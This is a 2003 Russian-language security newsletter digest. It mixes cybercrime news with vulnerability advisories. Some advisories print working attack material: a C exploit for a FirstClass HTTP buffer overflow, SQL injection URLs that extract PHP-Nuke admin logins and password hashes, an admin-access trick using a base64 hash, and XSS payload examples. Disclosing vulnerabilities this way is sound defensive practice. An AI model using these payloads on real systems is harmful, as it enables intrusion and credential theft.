Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru


Информационная безопасность на Стра.тег.ру за 2003/10/9 00:3 - 2003/10/9 23:3


Власти США увеличивают сроки отсидки для хакеров

9 октября | Рубрика: Регулирование: Законы, постановления, сертификация, контроль

С 1 ноября сроки тюремного заключения по большинству компьютерных преступлений будут увеличены. Об этом сообщил сайт Washington Post.

Новые ужесточение меры наказания, к сожалению, не уменьшат количество преступлений. Бытующее мнение о сложившейся ситуации поддержал обер-хакер Кевин Митник.

Количество компьютерных преступлений в США только за последние полгода выросло на треть. Большинство из них так и остаются нераскрытыми, - в сети правосудия опадаются лишь наименне опытные компьютерные взломщики.

0

За попытку обнаружения дыр арестован руководитель компании ForensicTec Solutions

9 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

В августе прошлого года интернет-компания ForensicTec Solutions уже была в центре внимания прессы. Тогда, в газете The Washington Post, после ряда обысков, проведенных спецслужбами в офисах фирмы, были опубликованы доказательства взлома ими 34 сайтов организаций, связанных с военно-морским флотом, армией и так далее.

На этой неделе был арестован руководитель интернет-компании ForensicTec Solutions, 36-летний Бретт Эдвард О'Кифи, которая  занимается вопросами компьютерной безопасности.

Вся эта ситуация напоминает историю с известным хакером Адрианом Ламо, который также не наносил компаниям никакого ущерба и информировал их о дырах в ПО и только недавно сдался властям.

1

Итернет облегчает жизнь ворам

9 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

В Японии арестован 46-летний мужчина, который 28 июля, воспользовавшись системой интернет-банкинга, украл 7 миллионов йен со счета директора своей компании.

Надо отдать должное воришке - он не стал брать все, хотя и мог стать обладателем 120 миллионов йен, лежащих на счету. Кредитную карточку господин Морука попросту украл у директора, а Интернет лишь облегчил ему путь к заветным миллионам.
2


Криминал наступает на Интернет, а Управлением «К» - на криминал

9 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

Сегодня все больше традиционных преступлений переносится в Интернет. Специалисты отмечают, что рост числа таких правонарушений идет не менее быстрыми темпами, чем компьютеризация. По оценкам экспертов, за последние три года число ежегодно регистрируемых преступлений в этой сфере выросло в 20 раз.

В России преступлениями в сфере высоких технологий занимается Управление по борьбе с киберпреступностью или Управление «К». По его данным, в 2001 году по фактам преступлений в сфере компьютерной информации в России было возбуждено 436 уголовных дел, что в четыре раза больше, чем в 2000 году. В прошлом году в целом число выявленных преступлений в сфере высоких технологий возросло почти в 3 раза - по ним было возбуждено около 1900 уголовных дел.

Помимо преступлений, включающих неправомерный доступ к компьютерной информации, распространение вредоносных программ и нарушение правил эксплуатации ЭВМ и электронных сетей, сотрудники Управления «К» выявили также немало преступлений по статье «мошенничество» с использованием всемирной компьютерной сети.

По информации оперативников, средний возраст тех, кто занимается взломами чужих паролей, кражами времени и информации - 16-23 года. Действуют они обычно тремя способами. Первый - получение алгоритмов по взлому (так называемых троянов) на хакерских сайтах. Второй - получение уже готовых паролей и логинов от знакомых и друзей. И третий - покупка CD с уже готовыми программами взлома. Так, в мае 2003 года сотрудники отдела «К» в ходе проверки одного из компьютерных магазинов изъяли диск с программой, предназначенной для взлома чужих почтовых ящиков.

Спецификой работы столичного отдела Управления «К» является то, что до 50% всех российских вычислительных мощностей сосредоточено в Москве. До 80% оборота финансовых средств, включая электронную торговлю, также сосредоточено в Москве, поэтому преступники стараются работать на московских ресурсах.
3


Суд ЮАР выпустил компьютерного грабителя под залог в 1,5 тысячи долларов

9 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

Решением южноафриканского суда на свободу под залог в 10 тысяч рандов (около 1,5 тыс. долларов) отпущен Йоханнес Якобус Фурье (Johannes Jacobus Fourie), подозреваемый в хакерских атаках на "Объединенные банки Южной Африки" (Absa).

По данным обвинения, используя компьютерные сети Absa, Фурье совершил 55 хищений денежных средств на общую сумму в 500 тысяч рандов (примерно 73 тыс. долларов). По словам адвоката подозреваемого Питера Михалика (Peter Mihalik), единственным препятствием для освобождения Фурье под залог было предположение обвинителей о том, что, оказавшись на свободе, хакер вновь начнет совершать компьютерные кражи.

Михалик отметил, что его клиент пока не признан виновным. В свою очередь, члены следственной группы сообщили, что Фурье продолжал совершать кражи даже после того, как полиция официально обвинила его подозреваемым в преступлении. К словам полицейских присоединился и прокурор Энтони Стивен (Anthony Stephen). Он рассказал, что первым владельцем банковской карты, пострадавшим от деяний Фурье, стал отец подозреваемого.

Стивен напомнил, что по совокупности инкриминируемых деяний отпущенному под залог хакеру грозит до 15 лет лишения свободы. Хищения по схеме Фурье может совершить практически каждый пользователь компьютера и даже телефона, считает прокурор.
4


NHTCU изучaют код вирусов

9 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.

В Англии подразделение NHTCU (National Hi-Tech Crime Unit)- отряд полиции, занимающийся расследованием кибер-преступлений, - получило приказ как можно пристальнее присмотреться к вирусописателям как людям, возможно завербованным террористическими организациями.

Одновременно начата работа по изучению кода вирусов, появившихся в последнее время, на предмет выявления наиболее профессионально написанных червей, за созданием которых, вероятно, стоит целая организация. Целями расследования являются как выявление самих вирусописателей и их связей, так и прогноз появления в Сети новых вирусов и червей.

Кроме того, английские полицейские надеются таким образом научиться предсказывать офлайновые теракты.

5


Британская полиция предупреждает о расцвете организованной преступности в Сети

9 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

Правоохранительные органы многих стран продолжают выражать серьезную озабоченность в связи с ростом числа интернет-преступлений. При этом, если раньше мошенничеством и взломами в Сети занимались небольшие группы или одиночки, то теперь можно говорить о приходе в интернет самой настоящей организованной преступности. Именно так считает Лен Хиндс, глава британского Национального управления по преступлениям в сфере высоких технологий (NHTCU).

О своем видении проблемы Хиндс рассказал в интервью агентству Reuters. По мнению руководителя NHTCU наиболее уязвимыми перед интернет-преступниками являются индивидуальные пользователи интернета, компьютеры которых, как правило менее защищены, а сами пользователи зачастую слишком доверчивы.

Хиндс назвал несколько основных сфер, в которых работают организованные преступные группировки в интернете. Во-первых, это различные формы финансового мошенничества и воровство номеров кредитных карт. Наиболее распространенным является сценарий с созданием фальшивых сайтов известных финансовых организаций. Злоумышленники заманивают на них доверчивых пользователей и просят указать реквизиты кредитных карт или банковских счетов. За нынешний год NHTCU зафиксировало 40 случаев подделки сайтов британских финансовых организаций. Годом ранее таких случаев было всего семь.

Не менее серьезной, по мнению Хиндса, является проблема распространения в Сети детской порнографии. С этим активно борются во всем мире, и сообщения о пресечении деятельности преступных группировок, промышляющих таким бизнесом, появляются в прессе довольно часто. Однако окончательно искоренить проблему не удастся еще очень долго.

Еще одним направлением деятельности организованной преступности в интернете является проведение хакерских атак. С превращением интернета в важный бизнес-инструмент такие атаки стали наносить все больший ущерб бизнесу. Хакерские атаки и вирусы могут использоваться преступными группировками в целях мошенничества или намеренного нанесения ущерба чужому бизнесу. В настоящее время, по словам Хиндса, NHTCU ведет расследование возможной связи авторов червей Blaster и Sobig.f с преступными группировками.

Упомянул Хиндс и о географическом распределении онлайновых преступных группировок. Они имеются практически по всему земному шару, но в последнее время британским следователям все чаще встречаются случаи преступлений, корни которых уходят в страны Восточной Европы и бывшего Советского Союза.

6

Удаленное переполнение буфера в FirstClass Internet Services

9 октября | Рубрика: Дыры и патчи программ и операционных сред

Программа: FirstClass 7.1 build 133 (SP3) и более ранние версии

Опасность: Высокая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в FirstClass Internet Services. Удаленны пользователь может вызвать отказ в обслуживании и скомпрометировать уязвимую систему.

Уязвимость в проверке границ обнаружена в "fcintsrv.exe" при обработке HTTP запросов. В результате удаленный пользователь может послать специально сформированный HTTP запрос, чтобы вызвать переполнение динамической памяти.

Пример/Эксплоит:

GET / HTTP/1.1[A x 246]
Эксплоит:
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")

#define PerfectOverwrite 246

void main (int argc, char *argv[])
{

int len;
SOCKET sock1;
SOCKADDR_IN sin;
char *sav;

WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);

printf ("- FirsClass Internet Services Remote DoS -\n\n"
"Discovered & coded by I2S-LAB\n"
"http://www.I2S-LaB.com\n\n");


if (!argv[1])
{
printf ("Usage : %s <IP Address>\n", argv[0]);
ExitProcess (0);
}

if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);

if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
{
printf ("Error ! cannot allocate enough memory.\n");
ExitProcess (0); 
};

lstrcat (sav, "GET / HTTP/1.1");
memset (&sav[14], 'A', PerfectOverwrite - 4);
lstrcat (sav,"DDDD\r\n\r\n");

sin.sin_family = AF_INET;
sin.sin_port = htons (80);

if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Incorrect IP Address : %s\n", argv[1]);
ExitProcess(0);
}

sock1 = socket (AF_INET, SOCK_STREAM, 0);

printf ("\nconnecting to %s...", argv[1]);

if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
printf ("connection failed!\n");

else
{
printf ("ok!\nSending crafted request...");

send (sock1,sav, PerfectOverwrite + 18,0);
puts ("ok!");
} 

closesocket (sock1);
}

URL производителя: http://www.centrinity.com

Решение: Установите обновленную версию программы.

7

Sql инъекция и неавторизованный доступ в Spaiz-Nuke и PHP-nuke

9 октября | Рубрика: Дыры и патчи программ и операционных сред

Программа: Spaiz-Nuke версии <=1.2beta, PHP-nuke все версии

Опасность: Высокая

Наличие эксплоита: Да

Описание: Несколько уязвимостей обнаружено в Spaiz-Nuke и PHP-nuke. Удаленный пользователь может выполнить произвольный Sql код на уязвимой системе. Удаленный пользователь может получить доступ к системе без пароля.

1. sql-кода в модуле администрирования

Уязвимость обнаружена в сценарии auth.php в функции проверки логина и пароля. Атакующий может получить зашифрованный пароль администратора. Отсутствие проверки ввода обнаружено в переменной $aid содержащей логин для авторизации. Используя кавычку можно перенаправить вывод в произвольный файл на сервере. Эксплоит:

www.site.com/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%
20'/path_to_file/pwd.txt 
(проверялось только на spaiz-nuke) После ввода данной строки в браузере на уязвимом сервере будет создан файл /path_to_file/pwd.txt содержащий зашифрованный пароль для логина "Admin".

Решение:

Включите magic_quotes_gpc в php.ini файле

2. Внедрение sql-кода в модуле web_links

Отсутствие проверки ввода обнаружено в переменной $cid в модуле web-links. Атакующий может внедрить произвольный sql-код.

Эксплоит:

Следующий эксплоит показывает пример получения логинов и зашифрованных паролей администраторов движка. Работает на БД поддерживающих команду UNION (mysql>4) Для других БД необходимо изменять вид sql-запроса.

  1. Для php-nuke

    Данная строка выдаст все логины:

    www.site.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%
    20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--
    
    Данная строка выдаст все зашифрованные пароли:
    www.site.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%
    20counter,%20pwd,%20aid%20FROM%20nuke_authors%20--
    
  2. Для spaiz-nuke

Изменить nuke_authors в строке на spnuke_authors 3. Внедрение sql-кода в модуле download *

Эксплоит:

  1. Для php-nuke
    www.site.com/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%
    20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--
    
  2. Для spaiz-nuke также как и в предыдущем случае.
4. Доступ без расшифровки пароля

Пароли данного движка шифруются с помощью алгоритма md5 однако атакующий может получить доступ даже не зная расшифрованного пароля.

Эксплоит:

Сначала следует зашифровать полученные логин и зашифрованный md5 пароль с помощью алгоритма base64.

Сделать это можно например здесь: http://www.isecurelabs.com/base64.php Шифруем этим алгоритмом следующую строку:

login:crypt_passwd:
где 
login=логин 
crypt_passwd=зашифрованный пароль.
Получаем хеш.

Например для admin:21232f297a57a5a743894a0e4a801fc3: хеш будет следующим:

YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6

Теперь можно получить доступ к панели администрирования используя следующий урл:

www.site.com/admin.php?admin=ваш_хэш
Вручную использование данной уязвимости немного неудобно поэтому был написан сплоит позволяющий добавить нового администратора со всеми правами. Посмотреть сплоит можно здесь: http://rst.void.ru/download/r57nuke.txt

URL производителя: http://www.php-nuke.org

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

8

Межсайтовый скриптинг в Geeklog

9 октября | Рубрика: Дыры и патчи программ и операционных сред

Программа: Geeklog 1.x, 2.x

Опасность: Средняя

Наличие эксплоита: Да

Описание: Множественные уязвимости обнаружены в Geeklog. Удаленный пользователь может выполнить XSS нападение.

Большинство функций форума не фильтрует код сценария, расположенный вне тэга SCRIPT. Например:

<img src="javascript:alert()">

URL производителя: http://www.geeklog.net/

Решение: Измените исходный код уязвимых сценариев или используйте альтернативное программное обеспечение.

9

Просмотр некоторых пользовательских файлов в PeopleSoft PeopleTools

9 октября | Рубрика: Дыры и патчи программ и операционных сред

Программа: PeopleSoft PeopleTools 8.42

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в PeopleSoft PeopleTools приложении. Удаленный пользователь может просматривать некоторые пользовательские файлы на системе, эксплуатируя недостаток "grid" опции.

Опция PeopleTools "grid" записывает временную копию поискового запроса, когда пользователь экспортирует результаты поиска в Excel spreadsheet (.xls) формат. Удаленный пользователь может просмотреть эту временную копию в течении 5 минут после использования функции "save as".

URL производителя: http://www.peoplesoft.com/corp/en/products/ptools/index.jsp

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

10

Выполнение произвольного кода в произвольном домене в Adobe SVG Viewer через "postURL" и "getURL" методы

9 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: Adobe SVG Viewer 3.0 и более ранние версии

Опасность: Высокая

Наличие эксплоита: Да

Описание: Уязвимость раскрытия информации обнаружена в Adobe SVG Viewer и browser control. Удаленный пользователь может просматривать файлы на целевой системе пользователя и удаленно расположенные файлы, которые доступны для чтения браузером целевого пользователя.

Выполнение нестандартных "postURL" и "getURL" методов в Adobe SVG Viewer может использоваться для обхода ограничений на доступ к информации других доменов. В результате удаленный пользователь может представить URL, который перенаправит браузер к файлу, чтобы просмотреть этот файл. Согласно сообщению, просмотр локальный файлов возможен только в Microsoft Internet Explorer (IE) без sp1. Однако просмотр удаленных файлов возможен во всех версиях Internet Explorer.

Пример/Эксплоит: http://security.greymagic.com/adv/gm003-mc/

URL производителя: http://www.adobe.com/svg/overview/whatsnew.html

Решение: Установите обновленную (3.1) версию программы: http://www.adobe.com/svg/viewer/install/mainframed.html

11

Доступ к информации других доменов в Adobe SVG Viewer при выполнении команды alert()

9 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: Adobe SVG Viewer 3.0 и более ранние версии

Опасность: Критическая

Наличие эксплоита: Да

Описание: Еще одна уязвимость доступа к информации других доменов обнаружена в Adobe SVG Viewer. Удаленный пользователь может выполнить произвольные команды и записывать файлы на целевой системе пользователя.

Adobe SVG Viewer позволяет удаленному пользователю создавать SVG документы или HTML код таким образом, чтобы при загрузки этих документов изменялся URL окна на другой домен, во время ожидания пользовательского ввода при выполнении команды "alert()" и затем продолжая выполнение кода в другом домене. В результате удаленный пользователь может украсть куки, читать локальные файлы и выполнять произвольные команды на системе.

Пример/Эксплоит: http://security.greymagic.com/adv/gm004-mc/

URL производителя: http://www.adobe.com/svg/overview/whatsnew.html

Решение: Установите обновленную (3.1) версию программы: http://www.adobe.com/svg/viewer/install/mainframed.html

12

Обход ограничений безопасности на запуск активных сценариев в e SVG Viewer

9 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: Adobe SVG Viewer 3.0 и более ранние версии

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Adobe SVG Viewer. Adobe SVG Viewer может использоваться для обхода ограничений безопасности на запуск активных сценариев в приложениях, использующих SVG Viewer WebBrowser control (например Internet Explorer).

Удаленный пользователь может сконструировать Scalable Vector Graphics (SVG) документ или HTML который, когда будет загружен целевым пользователем, выполнит активные сценарии на целевой системе, даже если запуск сценариев запрещен в настройках Internet Explorer. Как предполагается, SVG Viewer обеспечивает Document Object Model, который позволяет коду сценария управлять SVG документами, используя Microsoft JScript engine. Если HTML документ ссылается на SVG документ, то код сценария может контролировать родительский HTML документ, в обход ограничений безопасности Active Scripting в браузере целевого пользователя.

Пример/Эксплоит: http://security.greymagic.com/adv/gm002-mc/

URL производителя: http://www.adobe.com/svg/overview/whatsnew.html

Решение: Установите обновленную (3.1) версию программы: http://www.adobe.com/svg/viewer/install/mainframed.html

13

Переполнение буфера в slocate в ‘main.c’

9 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: slocate 2.6 и более ранние версии

Опасность: Средняя

Наличие эксплоита: Нет

Описание: Переполнение буфера обнаружено в slocate. Локальный пользователь может получить поднятые привилегии на целевой системе.

Переполнение стекового буфера в ‘main.c’ позволяет локальному пользователю выполнить произвольный код с привилегиями ‘slocale’ группы.

URL производителя: http://www.geekreview.org/slocate/

Решение:

Установите обновленную (2.7) версию программы: ftp://ftp.geekreview.org/slocate/

14

Sql инъекция в DeskPRO

9 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: DeskPRO 1.1.2

Опасность: Средняя

Наличие эксплоита: Нет

Описание: Уязвимость в проверке правильности входных данных обнаружена в DeskPRO. Удаленный пользователь может выполнить произвольные SQL команды на основной базе данных.

Программное обеспечение не проверяет пользовательские данные в некоторых численных параметрах. В результате удаленный пользователь может представить специально обработаный HTTP Get запрос, чтобы внедрить выполнить SQL команды на основной базе данных.

Согластно сообщению, уязвимы следующие сценарии:

/login.php
/includes/functions.php
/includes/functions2.php
/admin/login.php
/tech/login.php

URL производителя:http://www.deskpro.com/

Решение:Установите обновленную версию программы (1.1.2): http://www.deskpro.com/

15

Локальное переполнение буфера в 'ltrace'

9 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: ltrace 0.3.10-12 и более ранние версии

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Переполнение буфера обнаружено в 'ltrace'. Локальный пользователь может выполнить произвольный код с root привилегиями.

'ltrace' Dynamic Library Tracer содержит переполнение стекового буфера в функции *search_for_command() в 'options.c' файле. Локальный пользователь может представить специально обработанное имя файла к приложению, чтобы вызвать переполнение буфера и выполнить произвольный код с root привилегиями.

URL производителя: http://packages.debian.org/stable/utils/ltrace.html

Решение: Установите ltrace 0.3.20.

16

Межсайтовый скриптинг в Sun Cobalt RaQ 550

9 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: Sun Cobalt RaQ 550

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Sun Cobalt RaQ 550. Злонамеренный пользователь может выполнить XSS нападение.

Программное обеспечение не фильтрует параметр "info" в "/cgi-bin/.cobalt/message/message.cgi".

Пример/Эксплоит:

HTTP://[HOST NAME / DOMAIN]:[PORT:
81]/cgi-bin/.cobalt/message/message.cgi?info=[SCRIPT / XSS CODE]

URL производителя: http://www.sun.com

Решение:

Способов устранения обнаруженной уязвимости не существует в настоящее время.

17

Небезопасное создание временного файла shell сценарием в SuSE Linux

9 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: SuSE Linux 7.3 pro

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в SuSE Linux. Локальный пользователь может повысить свои привилегии.

Уязвимость связанна с небезопасным созданием временного файла "/tmp/.java_wrapper" shell сценарием "/sbin/conf.d/SuSEconfig.javarunt". Локальный пользователь может сконструировать символьную ссылку, чтобы создать, перезаписать или удалить произвольные файлы с root привилегиями.

URL производителя:http://www.suse.com/us/index.html

Решение:

Ограничьте доступ только доверенным пользователям к уязвимой системе. Отредактируйте shell сценарий, чтобы временные файлы создавались в ограниченном каталоге.

18

Интернет-мошенники атаковали 17 банков и ФБР

9 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. Информационая безопасность общественной коммуникации, личности.

Пострадавшие организации довольно быстро отреагировали на появление в сети мошенничества, направленного на пользователей популярных в развитых странах интернет-услуг, таких, например, как интернет-банкинг. В течение короткого промежутка времени незаконные сайты были блокированы национальными службами по борьбе с ИТ-преступлениями. Однако есть все основания предполагать, что новая волна мошенничества с использованием фальшивых «банковских» сайтов не заставит долго ждать.

Для защиты своих клиентов, которые были обманным путем приглашены на фальшивые «банковские» интернет-страницы якобы для уточнения личной информации, паролей и другой конфиденциальной информации, некоторые пострадавшие банки прекратили выплату денежных средств в размере от $500 до $750.

Целью мошенников были не только банки, но и государственные учреждения (ФБР), крупные международные корпорации, коммерческие и информационные порталы, а также платежные системы. Похитители информации не обошли стороной такие компании, как Amazon, AOL, Best Buy, Discover Card, E-Bay, Earthlink и Paypal.

Интернет-мошенники через сфальсифицированные «банковские» рассылки приглашали ничего не подозревающих пользователей обновить их пароли и личную информацию. Ссылки из текста писем вели пользователей на фальшивые интернет-страницы, на которых использовались логотипы и другие знаки пострадавших банков. Жулики стремились заполучить конфиденциальную информацию клиента банка для совершения финансовых операций с его счетом или кредитной картой. Эксперты в сфере информационной безопасности и защиты информации считают, что без дальнейшего совершенствования средств, направленных на более точную идентификацию пользователя, будет практически невозможно избавиться от подобного рода мошенничеств.

По мнению экспертов из mi2g, сложная схема, которую использовали мошенники для совершения афер на трех континентах, позволяет предположить, что пострадавшие организации имеют дело с международными преступными группами.

Во всех бедах иностранные специалисты винят хакеров и спамеров из Китая, Нигерии, России и других стран бывшего Советского Союза, считая, что, вполне возможно, злоумышленники из этих стран имели самое непосредственное отношение к распространившимся в последнее время аферам с раскрытием конфиденциальной информации.

Принимая во внимание, что мошенничество имеет целенаправленный характер - интерес у мошенников вызывают только те клиенты банков, которые пользуются услугами интернет-банкинга, – эксперты из mi2g считают, что некоторые служащие банков могут сознательно раскрывать некоторые данные (телефон или электронный адрес) клиентов банка.

В 2003 году мировой экономический ущерб от хакерских атак - явных и скрытых, - а также от последствий распространения вирусов и червей может превысить $132 млрд. По сравнению с 2002 г., когда подобный ущерб составил $48,47 млрд., рост ущерба может приблизиться к отметке 200%.

19

Удаленное выполнение произвольных команд в JBoss Java server

9 октября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны

Программа: JBoss Java Server 3.2.1

Опасность: Высокая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в JBoss Java server. Удаленный пользователь может выполнить произвольные команды на целевой системе.

Удаленный пользователь может подключиться к целевой Jboss на 1701 tcp порту и послать специально сформированное SQL выражение, чтобы выполнить произвольный код с привилегиями процесса Jboss. Удаленный пользователь может также вызвать отказ в обслуживании, внедряя сообщения в файл регистрации и получая информацию из целевой системы.

Основная проблема расположена в hsqldb службе. Если не были изменены имя пользователя и пароль по умолчанию, то удаленный пользователь может получить доступ к службе и эксплуатировать различные программные ошибки в sun.* классах и различные логические ошибки в org.apache.* классах, чтобы атаковать целевую систему.

URL производителя:

Решение:

Установите обновленную версию программы: http://sourceforge.net/docman/display_doc.php?docid=19314&group_id=22866

20

Разгорается спор вокруг отчета о безопасности ПО Microsoft

9 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны

Игроки на рынке взбудоражены вышедшим в конце сентября противоречивым отчетом, в котором заявляется, что бреши ПО Microsoft в сочетании с всеобщей распространенностью ее программ представляют общенациональную опасность.

Масло в огонь подлило и недавнее увольнение одного из составителей отчета.

«Сочетание двух факторов – брешей в ПО и монополии компании – обуславливает значимость описанной проблемы», заявил Эд Блек (Ed Black), президент и исполнительный директор Computer and Communication Industry Association, (CCIA) (Вашингтон, Округ Колумбия), торговой группы, считающейся критиком Microsoft. – «Несколько важных моментов пересекаются друг с другом и все вместе порождают огромную дыру в безопасности».

CCIA является автором и спонсором исследования, в то время, как к его публикации привлекли несколько других игроков на рынке безопасности. Отчет озаглавлен «Киберопасность: цена монополии» ('CyberInsecurity: The Cost of Monopoly').

Автор исследования - Даниель Гир (Daniel Geer), консультант по безопасности и, по совместительству, технический менеджер фирмы @Stake, занимающейся проблемами безопасности. Представитель @Stake подтвердил, что Гир не является служащим компании со времени опубликования исследования. Компания выпустила пресс-релиз, в котором указала, что «мнения, высказанные в отчете, не соответствуют официальной позиции @stake», а Гир больше никак не связан с компанией. Он также добавил, что Microsoft не оказывал никакого давление на принятие решения об увольнении Гира.

«Значит, задели за живое», полагает Блек. – «Королю никогда не понравится утверждения, что он голый. Сеть связей Microsoft – основа его мощи».

В отчете указывается на то, что большое число брешей в популярных программах производства Microsoft, а также повсеместное распространение этого ПО ведет к катастрофическому снижению уровня безопасности.

«Если можно пробить одну Windows систему, можно пробить и миллионы», отметил Блек. – «Мы утверждаем, что когда вся нация, весь индустриальный мир на 96% зависит от дыр в продукте, появляется серьезная проблема… Она имеет лавинообразный характер».

Блек добавил, что зависимость Соединенных Штатов от программного обеспечения Microsoft ставит всю страну под угрозу.

«Инфраструктура любой крупной компании или правительства, любая значимая система подвержена риску», добавил Блек. – «Они уязвимы, пока полагаются на систему, имеющую бреши».

Крис Белтхофф (Chris Belthoff), старший аналитик в антивирусной компании Sophos, согласен с наличием риска. Белтхофф проводит большую часть рабочего времени в борьбе с червями и вирусами, вроде Blaster и Sobig, атакующими Windows системы от Microsoft. Он отметил, что создатели вирусов атакуют эти системы по двум простым причинам: бреши в коде делают их уязвимыми, в то время, как огромный сегмент рынка, занимаемый Microsoft, делает их поражаемыми в массовом порядке.

«Вряд ли найдется еще один такой производитель, занимающий столь критичный сегмент экономики и обширнейший сегмент рынка», добавил Белтхофф. – «Представьте, что его продукты враз перестанут работать. Это разрушит национальную инфраструктуру ИТ».

«Есть ли у людей повод для недовольства?», интересуется Белтхофф. – «Конечно. Есть резонный повод быть недовольным».

Однако, не все с этим согласны.

Ден Вулли (Dan Woolley), опытный игрок в сфере безопасности и вице-президент компании Computer Associates, тесно связанной с Microsoft, назвал отчет и приводящиеся в нем обвинения «нонсенсом».

«Я знаю, о чем пишут эти ребята, но довольно трудно все это переварить, особенно, если учесть, что некоторые из них являются прямыми конкурентами Microsoft», заявил Вулли. – «Есть ли смысл в том, что они говорят? Да. Но только проблема-то несколько иная. Если я плохой парень и хочу кому-то насолить, то выберу наиболее распространенную систему. Это Microsoft. Просто при удачном раскладе это выведет из строя сразу много машин». Вулли полагает, что обвинения в том, что Microsoft представляет угрозу национальной безопасности, выглядят слишком натянутыми.

«Я не считаю, что их ПО плохо скомпоновано», добавил он. – «Моим основным аргументов против них является то, что нет другого такого производителя, который так же тщательно Microsoft пытается залатать все бреши в собственном ПО».

Кен Данхем (Ken Dunham), представитель компании iDefense, занимающейся безопасностью, считает, что Microsoft усиленно работает над совершенствованием своего ПО, но остается еще много неоптимизированного кода.

«Чтобы стать софтверным гигантом, Microsoft заметно повысил удобство использования своих программ», добавил Данхем. – «Оборотной стороной повышенной функциональности является большее число проблем… Microsoft в свое время написал этот код, теперь же ему следует сфокусировать свои усилия на повышении безопасности. Нужно исправить код».

21




Эти и другие новости читайте на сайте Стра.тег



http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное